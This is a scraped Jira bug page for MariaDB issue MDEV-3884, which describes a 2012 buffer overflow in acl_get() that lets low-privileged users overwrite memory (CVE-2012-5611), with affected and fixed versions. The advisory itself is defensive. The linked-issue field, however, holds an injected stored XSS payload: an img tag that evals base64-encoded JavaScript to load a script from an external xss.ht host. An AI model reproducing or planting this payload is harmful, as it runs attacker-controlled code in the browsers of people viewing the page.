[MDEV-3884] Buffer overflow in acl_get() - Jira

XML

Word

Printable

Details

Type: Bug
Status: Closed (View Workflow)
Priority: Blocker
Resolution: Fixed
Affects Version/s: 5.5.28, 5.3.10, 5.2.12, 5.1.62
Fix Version/s: 5.5.28a, 5.3.11, 5.2.13, 5.1.66
Component/s: None
Labels:
None

Description

MySQL bug 13889741 (which is CVE-2012-3163) was, apparently, not completely fixed. A very similar test case finds new, much more dangerous, buffer overflows in acl_get() and check_grant_db_routine(). They allow to overwrite the buffer by an arbitrary number of bytes, not just by one as in bug 13889741. One can trivially put a shellcode there.

To exploit this one needs a valid low-privileged user account in the MariaDB (or MySQL) server.

This new vulnerability is registered as CVE-2012-5611
Reported upstream as http://bugs.mysql.com/bug.php?id=67685
Public disclosure: http://seclists.org/fulldisclosure/2012/Dec/4

Attachments

Issue Links

is blocked by

MDEV-16899 "><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGs3NTUueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

Closed

Activity

People

Assignee:: Sergei Golubchik

Reporter:: Sergei Golubchik

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 2012-11-26 17:41

Updated:: 2018-08-05 08:49

Resolved:: 2012-12-03 11:49

Git Integration

Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.